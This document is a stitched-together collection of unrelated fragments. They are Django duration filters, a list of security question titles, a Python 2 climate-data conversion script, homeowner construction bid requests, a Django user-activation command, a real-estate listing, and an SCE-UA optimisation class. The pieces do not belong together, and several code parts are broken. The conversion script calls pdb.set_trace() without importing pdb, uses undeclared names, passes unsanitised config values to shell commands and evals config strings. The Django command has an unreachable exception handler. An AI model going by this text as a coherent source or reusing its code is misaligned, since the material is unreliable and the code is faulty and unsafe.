if not duration:
return ''
try:
return d_string(duration, precision)
except (ValueError, TypeError):
return ''
@register.filter
def hours(duration):
"""
Return the "hours" portion of a duration.
:param duration: a timedetla instance.
:returns: an integer representing the number of hours in duration.
"""
if not duration:
return 0
try:
h, m, s = duration_parts(duration)
return h
except (ValueError, TypeError):
return 0
@register.filter
def minutes(duration):
"""
Return the "minutes" portion of a duration.
:param duration: a timedetla instance.
:returns: an integer representing the number of minutes in duration.
"""
if not duration:
return 0
try:
h, m, s = duration_parts(duration)
return m
except (ValueError, TypeError):
return 0
@register.filter
def seconds(duration):
"""
Return the "seconds" portion of a duration.
:param duration: a timedetla instance.
:returns: an integer representing the number of seconds in duration.
"""
if not duration:
return 0
try:
h, m, s = duration_parts(duration)
return s
except (ValueError, TypeError):
return 0
|
Why do people say that PHP is inherently insecure?
Are there any “real world” implementations of secret-sharing encryption schemes?
What kind of encryption is a one-time pad?
How should passwords be stored if they must be recoverable?
What common products use Public-key cryptography?
What are the biggest unsolved problems in IT Security?
Is there an organization that reviews/approves crypto implementations?
Do security questions subvert passwords?
Ingress and Pokémon GO collect a lot of data - what impact could this have on my privacy or security?
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import cdms2
import cdtime
import cmor
import sys
import getopt
import factory
import numpy
from factory.formats import import_equation
from Toolbox.ESGFresources import *
from Toolbox.ESGFexcel import *
from Toolbox.CMORresources import CMORTable
# ************************************************************************
# process()
#
# Convert to obs4MIPS file format.
# ************************************************************************
def process( rc ):
'''
Convert netcdf/matlab/grads files into CMIP5 format.
'''
pdb.set_trace()
# ----------------------------
# Loop yearly on file list.
# ----------------------------
file_template = rc['file_template'].split(",");
if( len(file_template) == 2 ):
template_parameter = file_template[1]
rc['file_template'] = file_template[0]
else:
template_parameter = 'years'
for year in rc[template_parameter].split(","):
if(year == ''):
files= os.popen( "ls " + rc['file_template'] ).readlines()
else:
# ------------------------------------------------
# Use string formating for path with same argument
# ------------------------------------------------
try:
tmplFile = rc['file_template'] % (year)
except:
tmplFile = rc['file_template'].format(year)
if( not os.path.isfile( tmplFile) ) :
print "**** Warning %s not found\n" % ( tmplFile )
continue
files= os.popen( "ls " + tmplFile).readlines()
if( files == [] ):
print "No file found: Check your resource file"
return -1
# ------------------------------------------------
# Get the right handler to manage this file format
# ------------------------------------------------
Handler = factory.HandlerFormats(files[0].strip())
# -----------------------------------
# Take care of cmor initialization.
# -----------------------------------
cmor.setup(inpath=rc['inpath'],
netcdf_file_action = cmor.CMOR_REPLACE)
cmor.dataset(experiment_id = rc['experiment_id'],
institution = rc['institution' ],
calendar = rc['calendar' ],
institute_id = rc['institute_id' ],
model_id = rc['model_id' ],
source = rc['source' ],
contact = rc['contact' ],
references = rc['references' ])
# -----------------------------------------
# add extra Global Attributes for obs4MIPs.
# -----------------------------------------
cmor.set_cur_dataset_attribute( 'instrument', rc['instrument' ])
cmor.set_cur_dataset_attribute( 'mip_specs', rc['mip_specs' ])
cmor.set_cur_dataset_attribute( 'data_structure', rc['data_structure'])
cmor.set_cur_dataset_attribute( 'source_type', rc['source_type' ])
cmor.set_cur_dataset_attribute( 'source_id', rc['source_id' ])
cmor.set_cur_dataset_attribute( 'realm', rc['realm' ])
cmor.set_cur_dataset_attribute( 'obs_project', rc['obs_project' ])
cmor.set_cur_dataset_attribute( 'processing_version',
rc['processing_version'] )
cmor.set_cur_dataset_attribute( 'processing_level',
rc['processing_level'] )
cmor.load_table(rc['table'])
# ---------------------------------------------------------------------
# We loop on each file found, a new cmor file will be create on each
# iteration. If you want to aggregate, you need to use Grads ctl file
# or NeCDF list of file.
# ---------------------------------------------------------------------
for file in files:
fnm=file.strip() # Get rid of \n
aVariable = eval(rc['original_var'])
nbVariable = len(aVariable)
# -----------------------------------------------------
# ECMWF needs synoptic time 00z and 12z in he filename.
# We extract it from the first file in the list.
# -----------------------------------------------------
if( rc['source_fn'] == 'SYNOPTIC' ):
index = fnm.find('z.')
rc['SYNOPTIC'] = fnm[index-2:index]
# -----------------------
# Work on all variables
# -------------------------
for j in arange(nbVariable):
# ----------------------------------------------------
# Fetch the variable directly or excute equation.
# ----------------------------------------------------
try:
variable=aVariable[j]
Handler.open(fnm, variable=variable)
rc['cvrt_original_var'] = aVariable[j]
print "Working on variable %s " % variable
except:
if( aVariable[j] != 'equation' ) :
print "Variable %s can't open" % variable
continue
else:
print "Executing %s " % eval(rc['equation'])[j]
# pdb.set_trace()
rc['cvrt_original_units'] = eval(rc['original_units'])[j]
rc['cvrt_cmor_var'] = eval(rc['cmor_var'])[j]
rc['cvrt_equation'] = eval(rc['equation'])[j]
rc['cvrt_level'] = eval(rc['level'])[j]
data=Handler.getData()
# ----------------------------------------------------------
# Evaluate equation if needed. Usually used to change units
# ----------------------------------------------------------
if( rc['cvrt_equation'][0] == '@' ):
fncName = rc['cvrt_equation'][1:]
fnc = import_equation( "equations.%s" % fncName )
data[:]= fnc(Handler)
else:
data[:]=eval(rc['cvrt_equation'])
# -------------------------------------------------------------
# Save filled value in case data type is changed in createAxes
# -------------------------------------------------------------
fill_value = data.fill_value
# ---------------------------------------------
# Extract latitude/longitude
# ---------------------------------------------
lonvals=Handler.getLongitude()
latvals=Handler.getLatitude()
# ---------------------
# Create cmor time axis
# ----------------------
(rel_time, rel_time_bnds) = createTime(Handler, rc)
# ---------------------------------------------------
# Create cmor axes and add an axis to data if needed
# ---------------------------------------------------
(axes, data) = createAxes( rc, latvals, lonvals, data )
axis_ids = list()
for axis in axes:
axis_id = cmor.axis(**axis)
axis_ids.append(axis_id)
# ----------------------------------------------------------
# Create cmor variable
# Note: since this is in the loop, a new cmor file will be
# create for each cmor write command.
# ----------------------------------------------------------
varid = cmor.variable(table_entry = rc['cvrt_cmor_var'],
axis_ids = axis_ids,
history = '',
missing_value = fill_value,
original_name = rc['cvrt_original_var'],
units = rc['cvrt_original_units']
)
# -------------------------------
# Write data for this time frame.
# -------------------------------
cmor.write(varid,data,\
time_vals=rel_time,time_bnds=rel_time_bnds)
cmor.close(varid,file_name=True)
# ---------------------------------------
# Rename cmor files according to project.
# ---------------------------------------
if( movefiles(rc) ):
return -2
cmor.close()
return 0
# ********************************************************************
#
# createTime()
#
# Define Time and Time bound axes for cmor
#
# ********************************************************************
def createTime(Handler, rc):
'''
InputtimeUnits: specified from resource file or from first file
in a list of file.
return relative time and time bounds using OutputTimeUnits from
resource file.
'''
# ----------------------------------------------------
# Retrieve time units from file if not provided in the
# resource file.
# ----------------------------------------------------
InputTimeUnits = Handler.getTimeUnits(rc['InputTimeUnits'])
# --------------------------------------------------------
# Create time relative to January 1st 1900 to facilitate
# Threds software file handling.
# -------------------------------------------------------
cur_time = Handler.getTime(InputTimeUnits)
rel_time =[cur_time[i].torel(rc['OutputTimeUnits']).value
for i in range(len(cur_time))]
if( len(rel_time) == 1 ) :
deltarel = 1
else:
deltarel = rel_time[2] - rel_time[1]
rel_time_bnds = rel_time[:]
rel_time_bnds.append(rel_time[-1]+deltarel)
return rel_time, rel_time_bnds
# ********************************************************************
#
# getCMIP5lev()
#
# Extract CMIP5 mandatory level and recreate a new data array.
# They are 16 mandatory levels.
#
# ********************************************************************
def getCMIP5lev(data,rc):
'''
'''
oTable = CMORTable(rc['inpath'], rc['table'], "plevs")
# ----------------------
# Extract spefied levels
# ----------------------
if( 'levels' in oTable.dico.keys() ):
#pdb.set_trace()
dataLevels = data.getLevel()[:]
if( data.getLevel().units == "millibars" or
data.getLevel().units == "hPa" or
data.getLevel().units == "mbar" ):
# --------------------------
# Change units for to Pascal
# ---------------------------
LevelScaleFactor = 100
dataLevels = data.getLevel()[:] * LevelScaleFactor
# ----------------------------------------
# No level selected, return all data array
# ----------------------------------------
if( len(rc['cvrt_level'].split(":")) == 1 ):
levels = [ float(item) for item in dataLevels ]
lev=cdms2.createAxis( levels )
lev.designateLevel()
lev.units="pa"
lev.long_name=data.getLevel().long_name
#lev.id="lev"
#lev=data.getAxis(1)
#lev.__setattr__('_data_',dataLevels.astype(float))
#lev.__setattr__('units',"Pa")
#lev.units="hPa"
data2=data.pressureRegrid(lev)
return data2
if( rc['cvrt_level'].split(':')[1] == "CMIP5" ):
lev=cdms2.createAxis( [ float(item/LevelScaleFactor)
for item in dataLevels
if item in oTable.dico['levels' ] ] )
lev.designateLevel()
lev.units="pa"
lev.long_name = data.getLevel().long_name
data2=data.pressureRegrid(lev)
lev[:]=lev[:]*LevelScaleFactor
return data2
else:
# -----------------------
# Assume a list of values
# -----------------------
levels = rc['cvrt_level'].split(':')[1].split(",")
# --------------------------
# Change units to Pascal
# ---------------------------
dataLevels = [ float(rc['cvrt_level'].split(":")[1].split(",")[i]) * \
LevelScaleFactor for i in range(len(levels)) ]
# -----------------------------------
# Match dataLevels with CMIP5 levels
# Use file units
# -----------------------------------
lev=cdms2.createAxis( [ float(item/LevelScaleFactor)
for item in dataLevels
if item in oTable.dico['levels' ] ] )
# -----------------------------------
# Set axis metadata
# -----------------------------------
lev.units="pa"
lev.long_name = data.getLevel().long_name
lev.designateLevel()
# -----------------------------------
# Extract specified levels
# -----------------------------------
data2=data.pressureRegrid(lev)
# -----------------------------------
# Scale data back
# -----------------------------------
lev[:]=lev[:]*LevelScaleFactor
return data2
return data
# ********************************************************************
#
# createAxes()
#
# Define axes required by cmor and add z axis to data if needed
#
# ********************************************************************
def createAxes(rc, latvals, lonvals, data):
# ---------------------------------------------
# Create time/lat/lon axes using a dictionary
# ---------------------------------------------
axes = [
{'table_entry' : 'time',
'units' : rc['OutputTimeUnits']},
{'table_entry' : 'latitude',
'units' : 'degrees_north',
'coord_vals' : latvals,
'cell_bounds' : latvals.getBounds()},
{'table_entry' : 'longitude',
'units' : 'degrees_east',
'coord_vals' : lonvals,
'cell_bounds' : lonvals.getBounds()},
]
fill_value = data.fill_value
if( rc['cvrt_level'] == 'height2m' ):
axes.append({'table_entry' : 'height2m',
'units' : 'm',
'coord_vals' : [2.0] })
data = numpy.array(data[:])
data = data[:,:,:,numpy.newaxis]
elif( rc['cvrt_level'] != '' ):
data = getCMIP5lev( data, rc )
levels=data.getLevel()[:]
axes = numpy.insert(axes, 1,
{'table_entry' : 'plevs',
'units' : 'Pa',
'coord_vals' : levels })
return axes, data
# ********************************************************************
#
# usage()
#
# ********************************************************************
def usage(message):
'''
Describe program synopsis.
'''
print
print "*************************"
print message
print "*************************"
print
print
print "obs4MIPS_process.py [-h] -r resource"
print " resource: File containing Global attributes"
print ""
print "obs4MIPS will convert an input data file into CMIP5 format using "
print "CMOR. A directory path will be creating using CMOR by default or "
print "using a template provided in the resource file."
print
# ********************************************************************
#
# main()
#
# ********************************************************************
def main():
'''
'''
pdb.set_trace()
try:
opts, args = getopt.getopt(sys.argv[1:], "hy:r:x:",
["help" ,"year=","resource=","excel="])
except getopt.GetoptError, err:
usage(str(err))# will print something like "option -a not recognized"
return(2)
# --------------------------
# Verify passed arguments
# --------------------------
year = -1
resource = None
excel = None
for o, a in opts:
if o in ("-r", "--resource"):
resource = a
elif o in ("-x", "--excel"):
excel = a
elif o in ("-h", "--help"):
usage()
return(0)
elif o in ("-y", "--year"):
yr = a
else:
assert False, "unhandled option"
# ------------------------------
# Does the resource file exist?
# ------------------------------
if( ((resource == None ) or ( not os.path.isfile( resource ) )) and (( excel == None ) or ( not os.path.isfile( excel ) )) ):
usage("bad Input Resource/Excel File")
return 1
# -----------------------
# Read in "rc" file
# -----------------------
if( resource ):
rc = ESGFresources( resource )
if( excel ):
rc = ESGFexcel( excel )
# --------------------------------
# Extract CMIP5 Table information
# --------------------------------
oTable = CMORTable(rc['inpath'], rc['table'])
if( not 'original_var' in rc.resources.keys() ):
sys.exit(-1)
rc['project_id'] = oTable[ 'project_id' ]
rc['product'] = oTable[ 'product' ]
rc['modeling_realm'] = oTable[ 'modeling_realm' ]
rc['frequency'] = oTable[ 'frequency' ]
if( process(rc) ):
return -1
return 0
# ********************************************************************
#
# Call main program and return exit code
#
# ********************************************************************
if __name__ == '__main__':
sys.exit(main())
|
Want to install a 3 car garage with pad. Attached prefered but will consider breeze way on recommendation.
Plan is viewable online see "Architects Northwest" Plan M3040A3F-0. New construction to be built in the town of Orting Wa. 148th ave e.Will accept separate bids for foundation, Framing, etc. Or the entire house.
Bathroom needs to be gutted and totally redone. There is a lot of water damage and it needs to be rearranged to put in a standing shower instead of a bathtub.
This is for a SHOP only. 30 feet X 40 feet. Hardi-plank lap siding, comp roof, cement floor, 3 - 10 foot garage doors, electrical, plumbing.
I need a projected estimate on how much you think it will cause to build a 4044 Sq.Ft home on land that you are already building.
one level ranch style home, stucco exterior, terra cotta roof, on slab, 1500 total square feet living area, 3 bedroom, 2 bath, tile floors, bedrooms carpet, proch across front of house, no garage.
one level ranch style home, stucco exterior, terra cotta roof, on slab, 3 bedroom, 2 bath, tile floors, bedrooms carpet, proch across front of house, no garage.
I want to rebuild 5 row houses located on 8th Pine, Wilmington, De. Everything needs to be rebuilt and replaced I mean everything. I would also like to tear down the existing room additions that are attached on each house.
New sun room where deck is now, deck extended full length of house with jaccuzi in the middle. Large window in Master bedroom converted to a door with access to new deck. Also remove glass from master bathtoom and repalce with glass block.
we would like to add a master bedroom and bath suite onto our additional home, behind the garage which is covered with an existing concrete patio.Yard has a slight slope.
Story & 1/2 home. Kitchen/Dining(225sf), Living room(300sf), Master Bedroom(275sf), Laundry and Bath on ground floor; 2 or 3 Bedrooms and Bath upstairs. Concrete Foundation w/1 car garage under house. Covered porch across front.
we need to install an egress escape window in our basement. We currently have blocked glass, and will need to cut through concrete and install window,and window well.
The basement is not finished, but we plan to in the near future.
There is presently one floor. I Would like to add an additional floor. The home is presently a small bungalow with a full basement and one main floor.
I am trying to get bids on adding a room to our existing house - who in the area performs that type of work?
900sf cottage to be built in back of existing acreage home. 1-2 bedrooms, 1 bath, kitchen, great room, porch.
Prefer a mostly brickk home, with 3 bedrooms, two baths. Tile flooring in kitchen,laundry room, and bath rooms. Jacuzzi tub in master bath. Around 2,000 to 2,200 square foot.
I HAVE PLANS FOR A 1780 S.F. HOME.THIS HOME WILL BE BUILT ON THE EAST SIDE OF THE LAKE.
i am looking to have 2 addons to an existing structure. i basically need shells built, with roofs. i can do the inside work of drywall,and finishing.
I want to convert an unfinished 360 sq ft above-garage bonus room into a studio apartment. Room is studded out, with wiring. Needs plumbing, drywall, ceiling etc.
I have an unfinished walk-out basement, studded out. I would like to finish out appx. 1/2 (two rooms, closet and hallway for an office and rec. room. Needs drywall, electical, drop ceilint, etc.
I want an estimate (can be a vague one) on building a property. Specs. and plans are listed.
1- 20'by 20' addition off back of house on cinder blocks. 1- 20' by 24' garage attached to side of house.
ICF ext. walls, conc. slab, conc. roof tile, stucco exterior, stained conc. floors, detached garage (wood frame).
New two stall car gargage on cement slab. No interior work, rough framing only. Door/s/ provided.
We are curious about building costs per square foot in the Ruidoso, NM area--we want a small (1200 sq. ft.) cabin type second home.
A new construction of a living room 20x25 with a fire place and in that space a bathroom of 6x8 ft. This will be the new entrance of the house.
1700 sqft.3 brdroom 2 bath Wheelchair access shower, no steps.Master bed and bath a little larger for access.
Need to finish off a basement. Would like to have a bathroom and two large living areas.
Replace an existing 1200 sq. foot deck with composite materials and vinyl rails. We would like to have the deck done over the summer.
Total living area:1800 with around 250 sq ft unfinished bonus area over garage.
Start and finish dates are flexible.
I'd like to finish my basement. House built in 2001. I also want to add in extra large window for my family room. I could use both quotes for low-inexpensive materials, with ok workmanship as well as medium-good materials. Thanks.
We are looking at installing a deck in our back yard. No railing is needed but we would like a built in bench of somesort. The deck will be no larger than 10 x 15 feet. We ony require steps on one side of the deck.
Apply 400 sg ft of cultured stone to new fireplace in center of home.All interior work except 75 sg ft on roof top chimmney.Will purchase stone....but need mason to apply and grout.
Apply 400 sg ft of cultured to new fireplace in center of home.All interior work except 75 sg ft on roof top chimmney.Will purchase stone....but need mason to apply and grout.
@14x20 storage building either concrete floored or raised wood floor(depending on price). Vinyl siding. At least one door large enough to accomodate riding lawn mower.
Do not want barn-style roof.
complete home that is 80% complete.finish bricklaying, concrete slab in 3car garage,soffits, insulation, drywall and floors. house roughed for elect. and plumbing. need finish grading and cleanup. 3200 sq. ft.
I am looking to have deck put on with a screened in three season porch below. The dimensions would be about 20x20 for both.
New construction--need bids for site prep, plumbing, electrical, foundation, metal roof installation, exterior rock/masonry. Contact if interested, will furnish plans.
Carport convert to Den with bathroom.
|
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from optparse import make_option
import datetime
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option("-u", "--username", dest="username", nargs=1, help="Specify user id or username"),
)
def handle(self, *args, **options):
username = options.get('username')
user = None
if username:
try:
user = User.objects.get(username__icontains=username)
except User.MultipleObjectsReturned:
user = User.objects.get(username__iexact=username)
except User.DoesNotExist:
user = User.objects.get(email__iexact=username)
except User.DoesNotExist:
print " ---> No user found at: %s" % username
if user:
user.profile.activate_free()
user.profile.save()
else:
print " ---> No user found at: %s" % (username)
|
Want peace and quiet? Want room to roam? You must see this charming 3 bedroom, 2 bath home situated on 20+ acres. Very nice home with recent upgrades done, large covered front porch and large back deck. Large basement for storage and parking as well. Beautiful land with approximately 6.5 acres of pasture and the balance sparsely wooded. A wonderful place to call home and only minutes to I-81.
Stan shares the company goals of the most professional, committed and personalized real estate company in the area we serve. Stan consistently ranks in the top 1st or 2nd place in the local board in listings sold. He has a unique style of individualized marketing unsurpassed by any realtors locally and amazing compassion for his vast clientele. Making every customer know they are most important to his personal and company success.
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska and Stijn Van Hoey
This class holds the Shuffled Complex Evolution Algortithm (SCE-UA) algorithm, based on Duan (1994):
Duan, Q., Sorooshian, S. and Gupta, V. K.: Optimal use of the SCE-UA global optimization method for calibrating watershed models, J. Hydrol., 158(3), 265–284, 1994.
Based on Optimization_SCE
Copyright (c) 2011 Stijn Van Hoey.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import _algorithm
import spotpy
import numpy as np
import time
class sceua(_algorithm):
'''
Implements the SCE-UA algorithm from Duan (1994).
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast suited for short sampling time. no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
parallel: str
* seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
* mpc: Multi processing: Iterations on all available cores on your cpu (recommended for windows os).
* mpi: Message Passing Interface: Parallel computing on cluster pcs (recommended for unix os).
save_sim: boolean
*True: Simulation results will be saved
*False: Simulationt results will not be saved
alt_objfun: str or None, default: 'rmse'
alternative objectivefunction to be used for algorithm
* None: the objfun defined in spot_setup.objectivefunction is used
* any str: if str is found in spotpy.objectivefunctions,
this objectivefunction is used, else falls back to None
e.g.: 'log_p', 'rmse', 'bias', 'kge' etc.
'''
def __init__(self, *args, **kwargs):
if 'alt_objfun' not in kwargs:
kwargs['alt_objfun'] = 'rmse'
super(sceua, self).__init__(*args, **kwargs)
def find_min_max(self):
randompar=self.parameter()['random']
for i in range(1000):
randompar=np.column_stack((randompar,self.parameter()['random']))
return np.amin(randompar,axis=1),np.amax(randompar,axis=1)
"""
def simulate(self,params):
if self.repeat.phase=='burnin':
id,params = params
simulations =
"""
def simulate(self,id_params_tuple):
"""This overwrites the simple wrapper function of _algorithms.py
and makes a two phase mpi parallelization possbile:
1) burn-in
2) complex evolution
"""
if not self.repeat.phase: #burn-in
id,params = id_params_tuple
return id,params,self.model(params)
else:#complex-evolution
igs,x,xf,icall,cx,cf,sce_vars= id_params_tuple
self.npg,self.nopt,self.ngs,self.nspl,self.nps,self.bl,self.bu, self.status = sce_vars
# Partition the population into complexes (sub-populations);
# cx=np.zeros((self.npg,self.nopt))
# cf=np.zeros((self.npg))
#print(igs)
k1=np.arange(self.npg,dtype=int)
k2=k1*self.ngs+igs
cx[k1,:] = x[k2,:]
cf[k1] = xf[k2]
# Evolve sub-population igs for self.self.nspl steps:
likes=[]
sims=[]
pars=[]
for loop in xrange(self.nspl):
# Select simplex by sampling the complex according to a linear
# probability distribution
lcs=np.array([0]*self.nps)
lcs[0] = 1
for k3 in range(1,self.nps):
for i in range(1000):
#lpos = 1 + int(np.floor(self.npg+0.5-np.sqrt((self.npg+0.5)**2 - self.npg*(self.npg+1)*np.random.random())))
lpos = int(np.floor(self.npg+0.5-np.sqrt((self.npg+0.5)**2 - self.npg*(self.npg+1)*np.random.random())))
#idx=find(lcs(1:k3-1)==lpos)
idx=(lcs[0:k3]==lpos).nonzero() #check of element al eens gekozen
if idx[0].size == 0:
break
lcs[k3] = lpos
lcs.sort()
# Construct the simplex:
s = np.zeros((self.nps,self.nopt))
s=cx[lcs,:]
sf = cf[lcs]
snew,fnew,icall,simulation = self._cceua(s,sf,icall)
likes.append(fnew)
pars.append(list(snew))
self.status(igs,-fnew,snew)
sims.append(list(simulation))
#self.datawriter.save(-fnew,list(snew), simulations = list(simulation),chains = igs)
# Replace the worst point in Simplex with the new point:
s[-1,:] = snew
sf[-1] = fnew
# Replace the simplex into the complex;
cx[lcs,:] = s
cf[lcs] = sf
# Sort the complex;
idx = np.argsort(cf)
cf = np.sort(cf)
cx=cx[idx,:]
# Replace the complex back into the population;
return igs,likes,pars,sims,cx,cf,k1,k2
def sample(self,repetitions,ngs=20,kstop=100,pcento=0.0000001,peps=0.0000001):
"""
Samples from parameter distributions using SCE-UA (Duan, 2004),
converted to python by Van Hoey (2011).
Parameters
----------
repetitions: int
maximum number of function evaluations allowed during optimization
ngs: int
number of complexes (sub-populations), take more then the number of
analysed parameters
kstop: int
maximum number of evolution loops before convergency
pcento: int
the percentage change allowed in kstop loops before convergency
peps: float
Convergence criterium
"""
# Initialize the Progress bar
starttime = time.time()
intervaltime = starttime
# Initialize SCE parameters:
self.ngs=ngs
randompar=self.parameter()['random']
self.nopt=randompar.size
self.npg=2*self.nopt+1
self.nps=self.nopt+1
self.nspl=self.npg
npt=self.npg*self.ngs
self.iseed=1
self.bl,self.bu = self.parameter()['minbound'],self.parameter()['maxbound']
bound = self.bu-self.bl #np.array
# Create an initial population to fill array x(npt,self.self.nopt):
x=self._sampleinputmatrix(npt,self.nopt)
#Set Ininitial parameter position
#iniflg=1
nloop=0
icall=0
xf=np.zeros(npt)
#Burn in
param_generator = ((rep,list(x[rep])) for rep in xrange(int(npt)))
for rep,randompar,simulations in self.repeat(param_generator):
#Calculate the objective function
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
#Save everything in the database
self.status(rep,-like,randompar)
xf[rep] = like
self.datawriter.save(-like,randompar,simulations=simulations)
icall += 1
#Progress bar
acttime=time.time()
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (rep,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
# Sort the population in order of increasing function values;
idx = np.argsort(xf)
xf = np.sort(xf)
x=x[idx,:]
# Record the best and worst points;
bestx=x[0,:]
bestf=xf[0]
#worstx=x[-1,:]
#worstf=xf[-1]
BESTF=bestf
BESTX=bestx
ICALL=icall
# Compute the standard deviation for each parameter
#xnstd=np.std(x,axis=0)
# Computes the normalized geometric range of the parameters
gnrng=np.exp(np.mean(np.log((np.max(x,axis=0)-np.min(x,axis=0))/bound)))
# Check for convergency;
if icall >= repetitions:
print('*** OPTIMIZATION SEARCH TERMINATED BECAUSE THE LIMIT')
print('ON THE MAXIMUM NUMBER OF TRIALS ')
print(repetitions)
print('HAS BEEN EXCEEDED. SEARCH WAS STOPPED AT TRIAL NUMBER:')
print(icall)
print('OF THE INITIAL LOOP!')
if gnrng < peps:
print('THE POPULATION HAS CONVERGED TO A PRESPECIFIED SMALL PARAMETER SPACE')
# Begin evolution loops:
nloop = 0
criter=[]
criter_change=1e+5
starttime=time.time()
intervaltime=starttime
acttime=time.time()
self.repeat.setphase('ComplexEvo')
while icall<repetitions and gnrng>peps and criter_change>pcento:
nloop+=1
#print nloop
#print 'Start MPI'
# Loop on complexes (sub-populations);
cx=np.zeros((self.npg,self.nopt))
cf=np.zeros((self.npg))
sce_vars=[self.npg,self.nopt,self.ngs,self.nspl,self.nps,self.bl,self.bu, self.status]
param_generator = ((rep,x,xf,icall,cx,cf,sce_vars) for rep in xrange(int(self.ngs)))
for igs,likes,pars,sims,cx,cf,k1,k2 in self.repeat(param_generator):
icall+=len(likes)
x[k2,:] = cx[k1,:]
xf[k2] = cf[k1]
for i in range(len(likes)):
self.status(icall,-likes[i],pars[i])
self.datawriter.save(-likes[i],list(pars[i]), simulations = list(sims[i]),chains = igs)
#Progress bar
acttime=time.time()
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (icall,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
# End of Loop on Complex Evolution;
# Shuffled the complexes;
idx = np.argsort(xf)
xf = np.sort(xf)
x=x[idx,:]
# Record the best and worst points;
bestx=x[0,:]
bestf=xf[0]
#worstx=x[-1,:]
#worstf=xf[-1]
BESTX = np.append(BESTX,bestx, axis=0) #appenden en op einde reshapen!!
BESTF = np.append(BESTF,bestf)
ICALL = np.append(ICALL,icall)
# Computes the normalized geometric range of the parameters
gnrng=np.exp(np.mean(np.log((np.max(x,axis=0)-np.min(x,axis=0))/bound)))
# Check for convergency;
if icall >= repetitions:
print('*** OPTIMIZATION SEARCH TERMINATED BECAUSE THE LIMIT')
print('ON THE MAXIMUM NUMBER OF TRIALS ')
print(repetitions)
print('HAS BEEN EXCEEDED.')
if gnrng < peps:
print('THE POPULATION HAS CONVERGED TO A PRESPECIFIED SMALL PARAMETER SPACE')
criter=np.append(criter,bestf)
if nloop >= kstop: #nodig zodat minimum zoveel doorlopen worden
criter_change= np.abs(criter[nloop-1]-criter[nloop-kstop])*100
criter_change= criter_change/np.mean(np.abs(criter[nloop-kstop:nloop]))
if criter_change < pcento:
text='THE BEST POINT HAS IMPROVED IN LAST %d LOOPS BY LESS THAN THE THRESHOLD %f' %(kstop,pcento)
print(text)
print('CONVERGENCY HAS ACHIEVED BASED ON OBJECTIVE FUNCTION CRITERIA!!!')
# End of the Outer Loops
text='SEARCH WAS STOPPED AT TRIAL NUMBER: %d' %icall
print(text)
text='NORMALIZED GEOMETRIC RANGE = %f' %gnrng
print(text)
text='THE BEST POINT HAS IMPROVED IN LAST %d LOOPS BY %f' %(kstop,criter_change)
print(text)
#reshape BESTX
BESTX=BESTX.reshape(BESTX.size/self.nopt,self.nopt)
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: #Happens if no database was assigned
pass
print('Best parameter set')
print(self.status.params)
text='Duration:'+str(round((acttime-starttime),2))+' s'
print(text)
def _cceua(self,s,sf,icall):
# This is the subroutine for generating a new point in a simplex
#
# s(.,.) = the sorted simplex in order of increasing function values
# s(.) = function values in increasing order
#
# LIST OF LOCAL VARIABLES
# sb(.) = the best point of the simplex
# sw(.) = the worst point of the simplex
# w2(.) = the second worst point of the simplex
# fw = function value of the worst point
# ce(.) = the centroid of the simplex excluding wo
# snew(.) = new point generated from the simplex
# iviol = flag indicating if constraints are violated
# = 1 , yes
# = 0 , no
self.nps,self.nopt=s.shape
alpha = 1.0
beta = 0.5
# Assign the best and worst points:
sw=s[-1,:]
fw=sf[-1]
# Compute the centroid of the simplex excluding the worst point:
ce= np.mean(s[:-1,:],axis=0)
# Attempt a reflection point
snew = ce + alpha*(ce-sw)
# Check if is outside the bounds:
ibound=0
s1=snew-self.bl
idx=(s1<0).nonzero()
if idx[0].size <> 0:
ibound=1
s1=self.bu-snew
idx=(s1<0).nonzero()
if idx[0].size <> 0:
ibound=2
if ibound >= 1:
snew = self._sampleinputmatrix(1,self.nopt)[0] #checken!!
## fnew = functn(self.nopt,snew);
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like#bcf.algorithms._makeSCEUAformat(self.model,self.observations,snew)
#fnew = self.model(snew)
icall += 1
# Reflection failed; now attempt a contraction point:
if fnew > fw:
snew = sw + beta*(ce-sw)
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like
icall += 1
# Both reflection and contraction have failed, attempt a random point;
if fnew > fw:
snew = self._sampleinputmatrix(1,self.nopt)[0] #checken!!
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like#bcf.algorithms._makeSCEUAformat(self.model,self.observations,snew)
#print 'NSE = '+str((fnew-1)*-1)
#fnew = self.model(snew)
icall += 1
# END OF CCE
return snew,fnew,icall,simulations
def _sampleinputmatrix(self,nrows,npars):
'''
Create inputparameter matrix for nrows simualtions,
for npars with bounds ub and lb (np.array from same size)
distname gives the initial sampling ditribution (currently one for all parameters)
returns np.array
'''
x=np.zeros((nrows,npars))
for i in range(nrows):
x[i,:]= self.parameter()['random']
return x
